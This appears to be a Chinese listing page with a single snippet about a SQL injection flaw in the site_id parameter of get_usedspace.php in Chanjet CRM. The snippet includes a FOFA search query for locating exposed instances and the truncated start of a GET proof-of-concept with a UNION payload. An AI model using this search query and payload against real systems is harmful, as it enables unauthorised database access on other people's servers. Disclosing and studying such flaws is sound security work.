526互联

usedspace

用友畅捷通 畅捷CRM get_usedspace.php SQL注入漏洞

漏洞简介 畅捷CRM get_userspace.php文件中 site_id参数存在SQL注入漏洞 漏洞复现 fofa语法:icon_hash="-1068428644" 登录页面如下: POC: GET /WebSer~1/get_usedspace.php?site_id=-1159%20UN ......
get_usedspace 漏洞 usedspace CRM get
共1篇  :1/1页 首页上一页1下一页尾页